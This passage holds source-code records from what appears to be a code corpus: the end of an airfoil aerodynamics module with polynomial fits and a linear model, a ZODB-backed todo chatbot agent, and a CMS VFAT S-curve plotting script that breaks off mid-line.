self._Cmfit_RMS\n export['fit_error']['Cm']['RMSN'] = self._Cmfit_RMSN\n export[\"fit_coefs\"] = {}\n export[\"fit_coefs\"][\"CL\"] = list(self._CL_poly_coefs)\n export[\"fit_coefs\"][\"CD\"] = 
list(self._CD_poly_coefs)\n export[\"fit_coefs\"][\"Cm\"] = list(self._Cm_poly_coefs)\n\n # Export data\n with open(filename, 'w') as export_file_handle:\n json.dump(export, export_file_handle, indent=4)\n\n\n def import_polynomial_fits(self, **kwargs):\n \"\"\"Read in polynomial fit data from a JSON object.\n\n Parameters\n ----------\n filename : str\n JSON object to read polynomial fit data from.\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly imported polynomial fits for calculations. Defaults to True.\n\n \"\"\"\n\n # Get filename\n filename = kwargs.get(\"filename\")\n\n # Read in data\n with open(filename, 'r') as import_file_handle:\n input_dict = json.load(import_file_handle)\n\n # Parse input dict\n self._dof_db_order = input_dict[\"degrees_of_freedom\"]\n self._num_dofs = len(self._dof_db_order)\n self._dof_limits = input_dict.get(\"limits\", [[-np.inf, np.inf]]*self._num_dofs)\n self._CL_degrees = input_dict[\"fit_degrees\"][\"CL\"]\n self._CD_degrees = input_dict[\"fit_degrees\"][\"CD\"]\n self._Cm_degrees = input_dict[\"fit_degrees\"][\"Cm\"]\n self._CL_poly_coefs = np.array(input_dict[\"fit_coefs\"][\"CL\"])\n self._CD_poly_coefs = np.array(input_dict[\"fit_coefs\"][\"CD\"])\n self._Cm_poly_coefs = np.array(input_dict[\"fit_coefs\"][\"Cm\"])\n if isinstance(input_dict.get('fit_error', None), dict):\n if isinstance(input_dict['fit_error'].get('CL', None), dict):\n self._CLfit_R2 = input_dict['fit_error']['CL'].get('R^2', None)\n self._CLfit_RMS = input_dict['fit_error']['CL'].get('RMS', None)\n self._CLfit_RMSN = input_dict['fit_error']['CL'].get('RMSN', None)\n if isinstance(input_dict['fit_error'].get('CD', None), dict):\n self._CDfit_R2 = input_dict['fit_error']['CD'].get('R^2', None)\n self._CDfit_RMS = input_dict['fit_error']['CD'].get('RMS', None)\n self._CDfit_RMSN = input_dict['fit_error']['CD'].get('RMSN', None)\n if isinstance(input_dict['fit_error'].get('Cm', None), dict):\n self._Cmfit_R2 = input_dict['fit_error']['Cm'].get('R^2', None)\n self._Cmfit_RMS = input_dict['fit_error']['Cm'].get('RMS', None)\n self._Cmfit_RMSN = input_dict['fit_error']['Cm'].get('RMSN', None)\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"poly_fit\")\n\n\n def _get_polynomial_data(self, coef_index, **kwargs):\n # Determines the value of the given coefficient from the polynomial fit\n # coef_index | coef\n # 0 | CL\n # 1 | CD\n # 2 | Cm\n\n # Stack up independent vars\n ind_vars = []\n N = 1\n for dof in self._dof_db_order:\n\n # Get independent variable values\n ind_var = kwargs.get(dof, self._dof_defaults[dof])\n \n # Check for array of size 1 (np.asscalar was removed from NumPy, so index instead)\n if not np.isscalar(ind_var) and len(ind_var) == 1:\n ind_vars.append(ind_var[0])\n else:\n ind_vars.append(ind_var)\n\n # Update max size\n if not np.isscalar(ind_var):\n N = max(N, len(ind_var))\n\n # Fill any values\n if N > 1:\n for i, ind_var in enumerate(ind_vars):\n if np.isscalar(ind_var):\n ind_vars[i] = np.full(N, ind_var)\n\n # Setup input matrix\n if N == 1:\n x = np.array(ind_vars)[:,np.newaxis]\n else:\n x = np.array(ind_vars)\n\n # Get data\n if coef_index == 0:\n coef = multivariablePolynomialFunction(self._CL_poly_coefs, self._CL_degrees, x)\n elif coef_index == 1:\n coef = multivariablePolynomialFunction(self._CD_poly_coefs, self._CD_degrees, x)\n elif coef_index == 2:\n coef = multivariablePolynomialFunction(self._Cm_poly_coefs, self._Cm_degrees, x)\n\n 
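# Any input falling outside the range of the fitted data is flagged as NaN below\n # and then reported through PolyFitBoundsError.\n 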
# Check limits\n if self._raise_poly_bounds_error:\n for i in range(N):\n for j in range(self._num_dofs):\n if x[j,i] > self._dof_limits[j][1] or x[j,i] < self._dof_limits[j][0]:\n coef[i] = np.nan\n\n # Check for going out of bounds\n if np.isnan(coef).any():\n raise PolyFitBoundsError(self.name, np.argwhere(np.isnan(coef)).flatten(), kwargs)\n\n return coef\n\n\n def generate_linear_model(self, **kwargs):\n \"\"\"Creates a linearized model of the airfoil coefficients in alpha. Pulls from the\n database or poly_fit information to generate this model. Cannot be used on a type\n \"linear\" airfoil.\n\n Parameters\n ----------\n linear_limits : list, optional\n Limits in alpha for which the behavior of the airfoil can be considered linear. If not\n given, the user will be prompted to graphically select this region. Given in degrees.\n\n update_type : bool, optional\n Whether to change the type of the airfoil to \"linear\" once the model is determined.\n Defaults to True.\n\n plot_model : bool, optional\n Whether to display a polar of the linear region determined. Defaults to False.\n\n Rey : float, optional\n Reynolds number at which to evaluate the model.\n\n Mach : float, optional\n Mach number at which to evaluate the model.\n \"\"\"\n\n # Check for correct type\n if self._type == \"linear\":\n raise RuntimeError(\"generate_linear_model() cannot be called on a 'linear' type airfoil.\")\n\n # Determine range of alpha\n linear_limits = kwargs.get(\"linear_limits\", None)\n if linear_limits is None:\n alpha = np.linspace(-20.0, 20.0, 30)\n else:\n alpha = np.linspace(linear_limits[0], linear_limits[1], 30)\n\n # Generate dataset\n CL = np.zeros(30)\n Cm = np.zeros(30)\n CD = np.zeros(30)\n for i, a in enumerate(alpha):\n try:\n CL[i] = self.get_CL(alpha=np.radians(a), **kwargs)\n Cm[i] = self.get_Cm(alpha=np.radians(a), **kwargs)\n CD[i] = self.get_CD(alpha=np.radians(a), **kwargs)\n except DatabaseBoundsError:\n continue\n\n # Plot dataset for user to select linear region\n if linear_limits is None:\n\n # Define picker\n self._selected_ind = []\n def on_pick(event):\n\n # Get index\n i = int(event.ind[0])\n self._selected_ind.append(i)\n\n # Add x\n fig.axes[0].plot(alpha[i], CL[i], 'rx')\n\n # Check if we have enough\n if len(self._selected_ind) >= 2:\n plt.close(fig)\n\n # Display\n plt.ion()\n fig, ax = plt.subplots()\n ax.plot(alpha, CL, 'bo', picker=3)\n plt.xlabel(\"Alpha [deg]\")\n plt.ylabel(\"Lift Coefficient\")\n plt.title(\"To generate a linear model, select the lower and upper limits of the linear region.\")\n fig.canvas.mpl_connect('pick_event', on_pick)\n plt.show(block=True)\n plt.ioff()\n\n # Trim arrays\n self._selected_ind = sorted(self._selected_ind)\n if len(self._selected_ind) != 2:\n raise RuntimeError(\"Exactly two points must be selected to determine the linear region.\")\n alpha = np.radians(alpha[self._selected_ind[0]:self._selected_ind[1]+1])\n CL = CL[self._selected_ind[0]:self._selected_ind[1]+1]\n Cm = Cm[self._selected_ind[0]:self._selected_ind[1]+1]\n CD = CD[self._selected_ind[0]:self._selected_ind[1]+1]\n\n else:\n alpha = np.radians(alpha)\n\n # Get CL model\n coef_array = np.polyfit(alpha, CL, 1)\n self._CLa = coef_array[0]\n self._aL0 = -coef_array[1]/coef_array[0] # zero-lift angle of attack, so that CL = CLa*(alpha - aL0)\n self._CL_max = np.max(CL)\n\n # Get Cm model\n coef_array = np.polyfit(alpha, Cm, 1)\n self._Cma = coef_array[0]\n self._CmL0 = self._Cma*self._aL0+coef_array[1]\n\n # Get CD model\n coef_array = np.polyfit(CL, CD, 2)\n self._CD0 = coef_array[2]\n self._CD1 = coef_array[1]\n self._CD2 = coef_array[0]\n\n 
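# The stored model is CL = CLa*(alpha - aL0), Cm = CmL0 + Cma*(alpha - aL0), and\n # CD = CD0 + CD1*CL + CD2*CL**2 (a standard drag polar, quadratic in CL).\n\n 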
# Plot model within linear region\n if kwargs.get(\"plot_model\", False):\n\n # CL\n plt.close('all')\n fig, (ax0, ax1, ax2) = plt.subplots(nrows=1, ncols=3)\n fig.suptitle(\"Linear Model for {0}\".format(self.name))\n ax0.set_title(\"CL\")\n ax0.plot(alpha, CL, \"gx\", label=\"Data\")\n ax0.plot(alpha, (alpha-self._aL0)*self._CLa, \"g-\", label=\"Model\")\n ax0.legend()\n ax0.set_xlabel(\"Angle of Attack [rad]\")\n ax0.set_ylabel(\"Lift Coefficient\")\n\n # Cm\n ax1.set_title(\"Cm\")\n ax1.plot(alpha, Cm, 'bx', label=\"Data\")\n ax1.plot(alpha, (alpha-self._aL0)*self._Cma+self._CmL0, \"b-\", label=\"Model\")\n ax1.legend()\n ax1.set_xlabel(\"Angle of Attack [rad]\")\n ax1.set_ylabel(\"Moment Coefficient\")\n\n # CD\n ax2.set_title(\"CD\")\n ax2.plot(CL, CD, 'rx', label=\"Data\")\n ax2.plot(CL, self._CD0+self._CD1*CL+self._CD2*CL*CL, 'r-', label=\"Model\")\n ax2.legend()\n ax2.set_xlabel(\"Lift Coefficient\")\n ax2.set_ylabel(\"Drag Coefficient\")\n plt.show()\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self._type = \"linear\"\n\n\n def export_linear_model(self, **kwargs):\n \"\"\"Exports the linear coefficients used to predict the behavior of the airfoil.\n\n Parameters\n ----------\n filename : str\n JSON file to export the model data to.\n \"\"\"\n\n # Check there is a model to export\n if not hasattr(self, \"_aL0\"):\n raise RuntimeError(\"A linear model for {0} could not be exported because it has none.\".format(self.name))\n\n # Parse coefficients\n model_dict = {\n \"aL0\" : self._aL0,\n \"CLa\" : self._CLa,\n \"CmL0\" : self._CmL0,\n \"Cma\" : self._Cma,\n \"CD0\" : self._CD0,\n \"CD1\" : self._CD1,\n \"CD2\" : self._CD2,\n \"CL_max\" : self._CL_max\n }\n\n # Export\n filename = kwargs.get(\"filename\")\n with open(filename, 'w') as export_file_handle:\n json.dump(model_dict, export_file_handle, indent=4)\n","sub_path":"airfoil_db/airfoil.py","file_name":"airfoil.py","file_ext":"py","file_size_in_byte":115083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"566765188","text":"# coding=utf-8\nimport atexit\nimport time\n\nimport os\nimport random\nimport persistent\nimport transaction\nfrom BTrees.OOBTree import OOBTree\nfrom zentropi import (\n Agent,\n on_message,\n)\nfrom ZODB import DB, FileStorage\n\n\nclass Todo(persistent.Persistent):\n def __init__(self, items=None):\n self.items = items or []\n\n def add_item(self, item: str):\n self.items.append(item)\n self._p_changed = True\n transaction.commit()\n return len(self.items) - 1\n\n def mark_done(self, index: int):\n del self.items[index]\n self._p_changed = True\n transaction.commit()\n\n\nclass Activity(persistent.Persistent):\n def __init__(self):\n self.stack = []\n self.log = {} # type: dict\n\n def track_activity(self, activity):\n self.log.update({time.time(): activity})\n if self.stack and self.stack[-1] == activity:\n # track only changes in the stack (guard against an empty stack on first use)\n return\n self.stack.append(activity)\n\n\nDB_CLASSES = {\n 'activity': Activity,\n 'location': OOBTree,\n 'notification': OOBTree,\n 'todo': Todo,\n}\n\nFAQS = \"\"\"\\\nwhat can you do\nwhat functions do you have\n---\nI can track your TODOs, bookmark & search your favorite webpages \nor you can teach me how to operate other agents in your home.\n\"\"\"\nFAQS = FAQS.strip().split('===')\nFAQS = [faq.strip().split('---') for faq in FAQS]\nFAQS = [[q.strip().split('\\n'), a.strip().replace('\\n', ' ').replace(' ', ' ')] for (q, a) in FAQS]\n\n\ndef format_list(lst):\n return '\\n'.join(['{}: {}'.format(i, v) for i, v in enumerate(lst)])\n\n\nclass Maya(Agent):\n def __init__(self, name=None):\n super().__init__(name=name)\n 
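# ZODB handles; populated by load_db() below and closed again in save_db().\n 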
self.zodb_connection = None\n self.zodb_db = None\n self.zodb_storage = None\n self.states.activity = ''\n self.setup_faqs()\n self.db = self.load_db('~/.mayaisabot/mayaisabot.fs')\n\n def load_db(self, file_name):\n file_name = os.path.expanduser(file_name)\n print('*** Loading db {!r}'.format(file_name))\n storage = FileStorage.FileStorage(file_name)\n db = DB(storage)\n conn = db.open()\n root = conn.root()\n for table_name, table_class in DB_CLASSES.items():\n if not hasattr(root, table_name):\n setattr(root, table_name, table_class())\n print('*** Created table {!r}'.format(table_name))\n self.zodb_connection = conn\n self.zodb_db = db\n self.zodb_storage = storage\n atexit.register(self.save_db)\n return root\n\n def save_db(self):\n print('*** Saving db...')\n self.zodb_connection.close()\n self.zodb_db.close()\n self.zodb_storage.close()\n\n def setup_faqs(self):\n for questions, answer in FAQS:\n for q in questions:\n print('***', q, answer)\n # Bind the current answer via a default argument; a bare closure would\n # capture the loop variable, making every FAQ return the last answer.\n self.on_message(q, fuzzy=True)(lambda _, answer=answer: answer)\n\n @on_message('hey')\n @on_message('hi')\n @on_message('hello')\n @on_message('hello {}', parse=True)\n async def greeting(self, message):\n if message.source == self.name:\n return\n return '{}! What can I do for you?'.format(\n random.choice(['Hey', 'Hi', 'Hello', 'Hey there']))\n\n @on_message('todo {item}', parse=True)\n def todo_add(self, message):\n item = message.data.item\n index = self.db.todo.add_item(item)\n return 'Saved {}: {}'.format(index, item)\n\n @on_message('todos')\n def todo_list(self, message):\n items = self.db.todo.items\n return format_list(items) or 'No todo items.'\n\n @on_message('done {index}', parse=True)\n def todo_done(self, message):\n try:\n index = int(message.data.index)\n except ValueError:\n return 'Expected an integer, got: {!r}'.format(message.data.index)\n if 0 <= index < len(self.db.todo.items):\n item = self.db.todo.items[index]\n self.db.todo.mark_done(index)\n return '{}{!r} is done!'.format(\n random.choice(['Whoohoo! ', 'Super! 
', '', '', '']),\n item,\n )\n return 'Expected 0 <= index < {}, got: {}'.format(\n len(self.db.todo.items), index)\n\n @on_message('tg {chat_id} {text}', parse=True)\n def send_tg_message(self, message):\n text = message.data.text\n chat_id = message.data.chat_id\n if not text:\n return\n self.emit('send_telegram_message', data={'text': text, 'chat_id': chat_id})\n","sub_path":"src/mayaisabot/maya.py","file_name":"maya.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"36109877","text":"from rw_reg_lpgbt import *\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.colors as mcolors\r\nfrom matplotlib import cm\r\nimport numpy as np\r\nimport os, sys, glob\r\nimport argparse\r\n\r\nplt.rcParams.update({\"font.size\": 22}) # Increase font size\r\n\r\ndef getCalData(calib_path):\r\n slope_adc = {}\r\n intercept_adc = {}\r\n\r\n if os.path.isfile(calib_path):\r\n calib_file = open(calib_path)\r\n for line in calib_file.readlines():\r\n if \"vfat\" in line:\r\n continue\r\n vfat = int(line.split(\";\")[0])\r\n slope_adc[vfat] = float(line.split(\";\")[2])\r\n intercept_adc[vfat] = float(line.split(\";\")[3])\r\n calib_file.close()\r\n\r\n return slope_adc, intercept_adc\r\n\r\ndef DACToCharge(dac, slope_adc, intercept_adc, current_pulse_sf, vfat, mode):\r\n \"\"\"\r\n Slope and intercept for all VFATs come from the CAL_DAC cal file.\r\n If the cal file is not present, the default values used here are a rough average of cal data.\r\n \"\"\"\r\n\r\n slope = -9999\r\n intercept = -9999\r\n\r\n if vfat in slope_adc:\r\n if slope_adc[vfat]!=-9999 and intercept_adc[vfat]!=-9999:\r\n if mode==\"voltage\":\r\n slope = slope_adc[vfat]\r\n intercept = intercept_adc[vfat]\r\n elif mode==\"current\":\r\n slope = abs(slope_adc[vfat])\r\n intercept = 0\r\n if slope==-9999 or intercept==-9999: # use average values\r\n print (Colors.YELLOW + \"ADC Cal data not present for VFAT%d, using average values\"%vfat + Colors.ENDC)\r\n if mode==\"voltage\":\r\n slope = -0.22 # fC/DAC\r\n intercept = 56.1 # fC\r\n elif mode==\"current\":\r\n slope = 0.22 # fC/DAC\r\n intercept = 0\r\n charge = (dac * slope) + intercept\r\n if mode == \"current\":\r\n charge = charge * current_pulse_sf\r\n return charge\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Parsing arguments\r\n parser = argparse.ArgumentParser(description=\"Plotting VFAT SCurve\")\r\n parser.add_argument(\"-f\", \"--filename\", action=\"store\", dest=\"filename\", help=\"SCurve result filename\")\r\n #parser.add_argument(\"-t\", \"--type\", action=\"store\", dest=\"type\", help=\"type = daq or sbit\")\r\n parser.add_argument(\"-m\", \"--mode\", action=\"store\", dest=\"mode\", help=\"mode = voltage or current\")\r\n parser.add_argument(\"-c\", \"--channels\", action=\"store\", nargs=\"+\", dest=\"channels\", help=\"Channels to plot for each VFAT\")\r\n parser.add_argument(\"-fs\", \"--cal_fs\", action=\"store\", dest=\"cal_fs\", help=\"cal_fs = value of CAL_FS used (0-3), default = taken from VFAT config text file\")\r\n args = parser.parse_args()\r\n\r\n if args.channels is None:\r\n print(Colors.YELLOW + \"Enter channel list to plot SCurves\" + Colors.ENDC)\r\n sys.exit()\r\n\r\n if args.mode not in [\"voltage\", \"current\"]:\r\n print(Colors.YELLOW + \"Mode can only be voltage or current\" + Colors.ENDC)\r\n sys.exit()\r\n\r\n #if args.type not in [\"daq\", \"sbit\"]:\r\n # print(Colors.YELLOW + \"Type can only be daq or sbit\" + Colors.ENDC)\r\n # sys.exit()\r\n\r\n 
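# Hypothetical invocation (file path and channel numbers are illustrative only;\r\n # the path needs three components, since the OH name is parsed from the third):\r\n # python lpgbt_vfat_plot_scurve.py -f results/scurves/ME0_OH0_vfat_scurve.txt -m voltage -c 0 42 127\r\n 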
directoryName = args.filename.split(\".txt\")[0]\r\n plot_filename_prefix = (directoryName.split(\"/\"))[2]\r\n oh = plot_filename_prefix.split(\"_vfat\")[0]\r\n file = open(args.filename)\r\n\r\n try:\r\n os.makedirs(directoryName) # create directory for scurve analysis results\r\n except FileExistsError: # skip if directory already exists\r\n pass\r\n\r\n cal_fs = -9999\r\n if args.cal_fs is None:\r\n vfat_config_path = \"vfat_data/\"+oh+\"_vfatConfig.txt\"\r\n if not os.path.isfile(vfat_config_path):\r\n print(Colors.YELLOW + \"VFAT config file not present, provide CAL_FS used\" + Colors.ENDC)\r\n sys.exit()\r\n file_config = open(vfat_config_path)\r\n for line in file_config.readlines():\r\n if \"CFG_CAL_FS\" in line:\r\n cal_fs = int(line.split()[1])\r\n break\r\n file_config.close()\r\n else:\r\n cal_fs = int(args.cal_fs)\r\n if cal_fs > 3:\r\n print(Colors.YELLOW + \"CAL_FS can be only 0-3\" + Colors.ENDC)\r\n sys.exit()\r\n current_pulse_sf = -9999\r\n if cal_fs == 0:\r\n current_pulse_sf = 0.25\r\n elif cal_fs == 1:\r\n current_pulse_sf = 0.50\r\n elif cal_fs == 2:\r\n current_pulse_sf = 0.75\r\n elif cal_fs == 3:\r\n current_pulse_sf = 1.00\r\n if current_pulse_sf == -9999:\r\n print(Colors.YELLOW + \"invalid Current Pulse SF\" + Colors.ENDC)\r\n sys.exit()\r\n\r\n calib_path = \"vfat_data/vfat_calib_data/\"+oh+\"_vfat_calib_info_calDac.txt\"\r\n slope_adc, intercept_adc = getCalData(calib_path)\r\n\r\n scurve_result = {}\r\n for line in file.readlines():\r\n if \"vfat\" in line:\r\n continue\r\n\r\n vfat = int(line.split()[0])\r\n channel = int(line.split()[1])\r\n charge = int(line.split()[2])\r\n fired = int(line.split()[3])\r\n events = int(line.split()[4])\r\n\r\n #if args.mode == \"voltage\":\r\n # charge = 255 - charge\r\n charge = DACToCharge(charge, slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode) # convert to fC\r\n\r\n if vfat not in scurve_result:\r\n scurve_result[vfat] = {}\r\n if channel not in scurve_result[vfat]:\r\n scurve_result[vfat][channel] = {}\r\n if fired == -9999 or events == -9999 or events == 0:\r\n scurve_result[vfat][channel][charge] = 0\r\n else:\r\n scurve_result[vfat][channel][charge] = float(fired)/float(events)\r\n file.close()\r\n\r\n channelNum = np.arange(0, 128, 1)\r\n chargeVals = np.arange(0, 256, 1)\r\n\r\n numVfats = len(scurve_result.keys())\r\n if numVfats == 1:\r\n fig1, ax1 = plt.subplots(1, numVfats, figsize=(numVfats*10,10))\r\n cf1 = 0\r\n cbar1 = 0\r\n elif numVfats <= 3:\r\n fig1, ax1 = plt.subplots(1, numVfats, figsize=(numVfats*10,10))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 6:\r\n fig1, ax1 = plt.subplots(2, 3, figsize=(30,20))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 12:\r\n fig1, ax1 = plt.subplots(2, 6, figsize=(60,20))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 18:\r\n fig1, ax1 = plt.subplots(3, 6, figsize=(60,30))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 24:\r\n fig1, ax1 = plt.subplots(4, 6, figsize=(60,40))\r\n cf1 ={}\r\n cbar1 ={}\r\n\r\n vfatCnt0 = 0\r\n for vfat in scurve_result:\r\n fig, axs = plt.subplots(figsize=(10,10))\r\n axs.set_xlabel(\"Channel number\", loc = 'right')\r\n axs.set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n #axs.xlim(0,128)\r\n #axs.ylim(0,256)\r\n\r\n plot_data = []\r\n plot_data_x = []\r\n plot_data_y = []\r\n for dac in range(0,256):\r\n charge = DACToCharge(dac, slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode)\r\n plot_data_y.append(charge)\r\n data = []\r\n for channel in range(0,128):\r\n if channel not in scurve_result[vfat]:\r\n 
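# Channel absent from the scan entirely; record zero efficiency for this charge.\r\n 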
data.append(0)\r\n elif charge not in scurve_result[vfat][channel]:\r\n data.append(0)\r\n else:\r\n data.append(scurve_result[vfat][channel][charge])\r\n plot_data.append(data)\r\n for channel in range(0,128):\r\n plot_data_x.append(channel)\r\n\r\n cf = plt.pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n #chargeVals_mod = chargeVals\r\n #for i in range(0,len(chargeVals_mod)):\r\n # chargeVals_mod[i] = DACToCharge(chargeVals_mod[i], slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode)\r\n #plot = axs.imshow(plot_data, extent=[min(channelNum), max(channelNum), min(chargeVals_mod), max(chargeVals_mod)], origin=\"lower\", cmap=cm.ocean_r,interpolation=\"nearest\", aspect=\"auto\")\r\n cbar = fig.colorbar(cf, ax=axs, pad=0.01)\r\n cbar.set_label(\"Fired events / total events\", loc = 'top')\r\n axs.set_title(\"VFAT%02d\"%vfat)\r\n axs.set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n axs.text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=axs.transAxes)\r\n axs.text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=axs.transAxes)\r\n fig.tight_layout()\r\n fig.savefig((directoryName+\"/scurve2Dhist_\"+oh+\"_VFAT%02d.pdf\")%vfat)\r\n plt.close(fig)\r\n\r\n if numVfats == 1:\r\n ax1.set_xlabel(\"Channel number\", loc = 'right')\r\n ax1.set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1.set_title(\"VFAT%02d\"%vfat)\r\n cf1 = ax1.pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1 = fig1.colorbar(cf1, ax=ax1, pad=0.01)\r\n cbar1.set_label(\"Fired events / total events\", loc = 'top')\r\n ax1.set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1.text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1.transAxes)\r\n ax1.text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1.transAxes)\r\n elif numVfats <= 3:\r\n ax1[vfatCnt0].set_xlabel(\"Channel number\", loc = 'right')\r\n ax1[vfatCnt0].set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1[vfatCnt0].set_title(\"VFAT%02d\"%vfat)\r\n cf1[vfatCnt0] = ax1[vfatCnt0].pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1[vfatCnt0] = fig1.colorbar(cf1[vfatCnt0], ax=ax1[vfatCnt0], pad=0.01)\r\n cbar1[vfatCnt0].set_label(\"Fired events / total events\", loc = 'top')\r\n ax1[vfatCnt0].set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1[vfatCnt0].text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1[vfatCnt0].transAxes)\r\n ax1[vfatCnt0].text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1[vfatCnt0].transAxes)\r\n elif numVfats <= 6:\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_xlabel(\"Channel number\", loc = 'right')\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_title(\"VFAT%02d\"%vfat)\r\n cf1[int(vfatCnt0/3), vfatCnt0%3] = ax1[int(vfatCnt0/3), vfatCnt0%3].pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1[int(vfatCnt0/3), vfatCnt0%3] = fig1.colorbar(cf1[int(vfatCnt0/3), vfatCnt0%3], ax=ax1[int(vfatCnt0/3), vfatCnt0%3], pad=0.01)\r\n cbar1[int(vfatCnt0/3), vfatCnt0%3].set_label(\"Fired events / total events\", loc = 'top')\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, 
transform=ax1[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].text(0.015, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n else:\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_xlabel(\"Channel number\", loc = 'right')\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_title(\"VFAT%02d\"%vfat)\r\n cf1[int(vfatCnt0/6), vfatCnt0%6] = ax1[int(vfatCnt0/6), vfatCnt0%6].pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1[int(vfatCnt0/6), vfatCnt0%6] = fig1.colorbar(cf1[int(vfatCnt0/6), vfatCnt0%6], ax=ax1[int(vfatCnt0/6), vfatCnt0%6], pad=0.01)\r\n cbar1[int(vfatCnt0/6), vfatCnt0%6].set_label(\"Fired events / total events\", loc = 'top')\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].text(-0.1, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n\r\n vfatCnt0+=1\r\n\r\n fig1.tight_layout()\r\n fig1.savefig((directoryName+\"/scurve2Dhist_\"+oh+\".pdf\"))\r\n plt.close(fig1)\r\n\r\n\r\n if numVfats <= 3:\r\n fig2, ax2 = plt.subplots(1, numVfats, figsize=(numVfats*10,10))\r\n leg2 = 0\r\n elif numVfats <= 6:\r\n fig2, ax2 = plt.subplots(2, 3, figsize=(30,20))\r\n leg2 ={}\r\n elif numVfats <= 12:\r\n fig2, ax2 = plt.subplots(2, 6, figsize=(60,20))\r\n leg2 ={}\r\n elif numVfats <= 18:\r\n fig2, ax2 = plt.subplots(3, 6, figsize=(60,30))\r\n leg2 ={}\r\n elif numVfats <= 24:\r\n fig2, ax2 = plt.subplots(4, 6, figsize=(60,40))\r\n leg2 ={}\r\n\r\n vfatCnt0 = 0\r\n for vfat in scurve_result:\r\n fig, ax = plt.subplots(figsize=(12,10))\r\n ax.set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax.set_ylabel(\"Fired events / total events\", loc = 'top')\r\n #if args.type == \"daq\":\r\n # plt.ylim(-0.1,1.1)\r\n #else:\r\n # plt.ylim(-0.1,2.1)\r\n\r\n for channel in args.channels:\r\n channel = int(channel)\r\n if channel not in scurve_result[vfat]:\r\n print (Colors.YELLOW + \"Channel %d not in SCurve scan\"%channel + Colors.ENDC)\r\n continue\r\n dac = range(0,256)\r\n charge_plot = []\r\n frac = []\r\n for d in dac:\r\n c = DACToCharge(d, slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode)\r\n if c in scurve_result[vfat][channel]:\r\n charge_plot.append(c)\r\n frac.append(scurve_result[vfat][channel][c])\r\n ax.grid()\r\n\r\n ax.plot(charge_plot, frac, \"o\",markersize = 6, label=\"Channel %d\"%channel)\r\n ax.text(-0.1, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax.transAxes)\r\n ax.text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax.transAxes)\r\n if numVfats == 1:\r\n ax2.grid()\r\n ax2.plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n elif numVfats <= 3:\r\n ax2[vfatCnt0].grid()\r\n ax2[vfatCnt0].plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n elif numVfats <= 6:\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].grid()\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n else:\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].grid()\r\n ax2[int(vfatCnt0/6), 